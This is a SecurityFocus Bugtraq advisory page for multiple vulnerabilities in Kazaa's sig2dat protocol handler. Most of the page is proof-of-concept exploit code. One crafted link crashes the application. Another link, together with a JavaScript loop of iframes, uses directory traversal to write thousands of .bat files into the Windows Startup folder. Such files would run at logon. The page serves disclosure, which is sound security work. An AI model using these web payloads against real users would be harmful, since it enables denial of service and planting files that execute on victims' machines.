Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Kazaa Sig2Dat Protocol Multiple Remote Vulnerabilities

No exploit is required to leverage these issues. The following proof of concepts have been provided:

To crash the affected application:
<A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:999999999999999999999999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A>

To create arbitrary files:

<A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start
Menu/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A>

<script>
var i
for (i=1;i<10000;i++)
{
mylocation="<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All
Users
/Start
Menu/Programs/Startup/cool"+i+".bat%7CLength:373236528%20Bytes,364489KB%
7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>";
document.write(mylocation);
}
</script>







 

Privacy Statement
Copyright 2009, SecurityFocus